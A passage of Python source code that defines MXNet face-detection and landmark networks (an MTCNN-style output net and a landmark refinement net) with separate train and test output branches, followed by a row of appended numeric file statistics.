bn6_2 = mx.sym.BatchNorm(data=conv6_2, name='bn6_2', fix_gamma=False,momentum=0.9)
conv6_3 = mx.symbol.FullyConnected(data=prelu6_dw, num_hidden=10, name="conv6_3")
bn6_3 = mx.sym.BatchNorm(data=conv6_3, name='bn6_3', fix_gamma=False,momentum=0.9)
if mode == "test":
bbox_pred = bn6_2
landmark_pred = bn6_3
group = mx.symbol.Group([cls_prob, bbox_pred, landmark_pred])
else:
bbox_pred = mx.symbol.LinearRegressionOutput(data=bn6_2, label=bbox_target,
grad_scale=1, name="bbox_pred")
landmark_pred = mx.symbol.LinearRegressionOutput(data=bn6_3, label=landmark_target,
grad_scale=1, name="landmark_pred")
out = mx.symbol.Custom(cls_prob=cls_prob, label=label, bbox_pred=bbox_pred, bbox_target=bbox_target,
landmark_pred=landmark_pred, landmark_target=landmark_target,
type_label=type_label, op_type='negativemining_landmark', name="negative_mining")
group = mx.symbol.Group([out])
else:
conv1 = mx.symbol.Convolution(data=data, kernel=(3, 3),pad=(1,1), num_filter=16, name="conv1")
bn1 = mx.sym.BatchNorm(data=conv1, name='bn1', fix_gamma=False,momentum=0.9)
prelu1 = mx.symbol.LeakyReLU(data=bn1, act_type="prelu", name="prelu1")
conv2_dw = mx.symbol.Convolution(data=prelu1, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=16, num_group=16, name="conv2_dw", no_bias=True)
bn2_dw = mx.sym.BatchNorm(data=conv2_dw, name='bn2_dw', fix_gamma=False,momentum=0.9)
prelu2_dw = mx.symbol.LeakyReLU(data=bn2_dw, act_type="prelu", name="prelu2_dw")
conv2_sep = mx.symbol.Convolution(data=prelu2_dw, kernel=(1, 1), num_filter=32, name="conv2_sep", no_bias=True)
bn2_sep = mx.sym.BatchNorm(data=conv2_sep, name='bn2_sep', fix_gamma=False,momentum=0.9)
prelu2 = mx.symbol.LeakyReLU(data=bn2_sep, act_type="prelu", name="prelu2")
conv3_dw = mx.symbol.Convolution(data=prelu2, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=32, num_group=32, name="conv3_dw", no_bias=True)
bn3_dw = mx.sym.BatchNorm(data=conv3_dw, name='bn3_dw', fix_gamma=False,momentum=0.9)
prelu3_dw = mx.symbol.LeakyReLU(data=bn3_dw, act_type="prelu", name="prelu3_dw")
conv3_sep = mx.symbol.Convolution(data=prelu3_dw, kernel=(1, 1), num_filter=32, name="conv3_sep", no_bias=True)
bn3_sep = mx.sym.BatchNorm(data=conv3_sep, name='bn3_sep', fix_gamma=False,momentum=0.9)
prelu3 = mx.symbol.LeakyReLU(data=bn3_sep, act_type="prelu", name="prelu3")
conv4_dw = mx.symbol.Convolution(data=prelu3, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=32, num_group=32, name="conv4_dw", no_bias=True)
bn4_dw = mx.sym.BatchNorm(data=conv4_dw, name='bn4_dw', fix_gamma=False,momentum=0.9)
prelu4_dw = mx.symbol.LeakyReLU(data=bn4_dw, act_type="prelu", name="prelu4_dw")
conv4_sep = mx.symbol.Convolution(data=prelu4_dw, kernel=(1, 1), num_filter=64, name="conv4_sep", no_bias=True)
bn4_sep = mx.sym.BatchNorm(data=conv4_sep, name='bn4_sep', fix_gamma=False,momentum=0.9)
prelu4 = mx.symbol.LeakyReLU(data=bn4_sep, act_type="prelu", name="prelu4")
conv5_dw = mx.symbol.Convolution(data=prelu4, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=64, num_group=64, name="conv5_dw", no_bias=True)
bn5_dw = mx.sym.BatchNorm(data=conv5_dw, name='bn5_dw', fix_gamma=False,momentum=0.9)
prelu5_dw = mx.symbol.LeakyReLU(data=bn5_dw, act_type="prelu", name="prelu5_dw")
conv5_sep = mx.symbol.Convolution(data=prelu5_dw, kernel=(1, 1), num_filter=128, name="conv5_sep", no_bias=True)
bn5_sep = mx.sym.BatchNorm(data=conv5_sep, name='bn5_sep', fix_gamma=False,momentum=0.9)
prelu5 = mx.symbol.LeakyReLU(data=bn5_sep, act_type="prelu", name="prelu5")
conv6_dw = mx.symbol.Convolution(data=prelu5, kernel=(3, 3), num_filter=128, num_group=128, name="conv6_dw", no_bias=True)
bn6_dw = mx.sym.BatchNorm(data=conv6_dw, name='bn6_dw', fix_gamma=False,momentum=0.9)
prelu6_dw = mx.symbol.LeakyReLU(data=bn6_dw, act_type="prelu", name="prelu6_dw")
conv6_1 = mx.symbol.FullyConnected(data=prelu6_dw, num_hidden=2, name="conv6_1")
bn6_1 = mx.sym.BatchNorm(data=conv6_1, name='bn6_1', fix_gamma=False,momentum=0.9)
cls_prob = mx.symbol.SoftmaxOutput(data=bn6_1, label=label, use_ignore=True, name="cls_prob")
conv6_2 = mx.symbol.FullyConnected(data=prelu6_dw, num_hidden=4, name="conv6_2")
bn6_2 = mx.sym.BatchNorm(data=conv6_2, name='bn6_2', fix_gamma=False,momentum=0.9)
if mode == "test":
bbox_pred = bn6_2
group = mx.symbol.Group([cls_prob, bbox_pred])
else:
bbox_pred = mx.symbol.LinearRegressionOutput(data=bn6_2, label=bbox_target,
grad_scale=1, name="bbox_pred")
out = mx.symbol.Custom(cls_prob=cls_prob, label=label, bbox_pred=bbox_pred, bbox_target=bbox_target,
op_type='negativemining', name="negative_mining")
group = mx.symbol.Group([out])
return group
def L_Net(mode="train"):
"""
Refine Network
input shape 3 x 48 x 48
"""
data = mx.symbol.Variable(name="data")
landmark_target = mx.symbol.Variable(name="landmark_target")
conv1 = mx.symbol.Convolution(data=data, kernel=(3, 3),pad=(1,1), num_filter=32, name="conv1")
bn1 = mx.sym.BatchNorm(data=conv1, name='bn1', fix_gamma=False,momentum=0.9)
prelu1 = mx.symbol.LeakyReLU(data=bn1, act_type="prelu", name="prelu1")
conv2_dw = mx.symbol.Convolution(data=prelu1, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=32, num_group=32, name="conv2_dw", no_bias=True)
bn2_dw = mx.sym.BatchNorm(data=conv2_dw, name='bn2_dw', fix_gamma=False,momentum=0.9)
prelu2_dw = mx.symbol.LeakyReLU(data=bn2_dw, act_type="prelu", name="prelu2_dw")
conv2_sep = mx.symbol.Convolution(data=prelu2_dw, kernel=(1, 1), num_filter=64, name="conv2_sep", no_bias=True)
bn2_sep = mx.sym.BatchNorm(data=conv2_sep, name='bn2_sep', fix_gamma=False,momentum=0.9)
prelu2 = mx.symbol.LeakyReLU(data=bn2_sep, act_type="prelu", name="prelu2")
conv3_dw = mx.symbol.Convolution(data=prelu2, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=64, num_group=64, name="conv3_dw", no_bias=True)
bn3_dw = mx.sym.BatchNorm(data=conv3_dw, name='bn3_dw', fix_gamma=False,momentum=0.9)
prelu3_dw = mx.symbol.LeakyReLU(data=bn3_dw, act_type="prelu", name="prelu3_dw")
conv3_sep = mx.symbol.Convolution(data=prelu3_dw, kernel=(1, 1), num_filter=64, name="conv3_sep", no_bias=True)
bn3_sep = mx.sym.BatchNorm(data=conv3_sep, name='bn3_sep', fix_gamma=False,momentum=0.9)
prelu3 = mx.symbol.LeakyReLU(data=bn3_sep, act_type="prelu", name="prelu3")
conv4_dw = mx.symbol.Convolution(data=prelu3, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=64, num_group=64, name="conv4_dw", no_bias=True)
bn4_dw = mx.sym.BatchNorm(data=conv4_dw, name='bn4_dw', fix_gamma=False,momentum=0.9)
prelu4_dw = mx.symbol.LeakyReLU(data=bn4_dw, act_type="prelu", name="prelu4_dw")
conv4_sep = mx.symbol.Convolution(data=prelu4_dw, kernel=(1, 1), num_filter=128, name="conv4_sep", no_bias=True)
bn4_sep = mx.sym.BatchNorm(data=conv4_sep, name='bn4_sep', fix_gamma=False,momentum=0.9)
prelu4 = mx.symbol.LeakyReLU(data=bn4_sep, act_type="prelu", name="prelu4")
conv5_dw = mx.symbol.Convolution(data=prelu4, kernel=(3, 3), pad=(1,1), stride=(2, 2), num_filter=128, num_group=128, name="conv5_dw", no_bias=True)
bn5_dw = mx.sym.BatchNorm(data=conv5_dw, name='bn5_dw', fix_gamma=False,momentum=0.9)
prelu5_dw = mx.symbol.LeakyReLU(data=bn5_dw, act_type="prelu", name="prelu5_dw")
conv5_sep = mx.symbol.Convolution(data=prelu5_dw, kernel=(1, 1), num_filter=256, name="conv5_sep", no_bias=True)
bn5_sep = mx.sym.BatchNorm(data=conv5_sep, name='bn5_sep', fix_gamma=False,momentum=0.9)
prelu5 = mx.symbol.LeakyReLU(data=bn5_sep, act_type="prelu", name="prelu5")
conv6_dw = mx.symbol.Convolution(data=prelu5, kernel=(3, 3), num_filter=256, num_group=256, name="conv6_dw", no_bias=True)
bn6_dw = mx.sym.BatchNorm(data=conv6_dw, name='bn6_dw', fix_gamma=False,momentum=0.9)
prelu6_dw = mx.symbol.LeakyReLU(data=bn6_dw, act_type="prelu", name="prelu6_dw")
conv6_3 = mx.symbol.FullyConnected(data=prelu6_dw, num_hidden=10, name="conv6_3")
bn6_3 = mx.sym.BatchNorm(data=conv6_3, name='bn6_3', fix_gamma=False,momentum=0.9)
if mode == "test":
landmark_pred = bn6_3
group = mx.symbol.Group([landmark_pred])
else:
landmark_pred = mx.symbol.LinearRegressionOutput(data=bn6_3, label=landmark_target,
grad_scale=1, name="landmark_pred")
out = mx.symbol.Custom(landmark_pred=landmark_pred, landmark_target=landmark_target,
op_type='negativemining_onlylandmark', name="negative_mining")
group = mx.symbol.Group([out])
return group | 67.571429 | 156 | 0.677565 | 3,214 | 20,339 | 4.067517 | 0.037026 | 0.085673 | 0.053545 | 0.068844 | 0.954104 | 0.946378 | 0.933986 | 0.931309 | 0.905607 | 0.901859 | 0 | 0.05842 | 0.168494 | 20,339 | 301 | 157 | 67.571429 | 0.714581 | 0.010423 | 0 | 0.800847 | 0 | 0 | 0.086193 | 0.002494 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016949 | false | 0 | 0.021186 | 0 | 0.055085 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.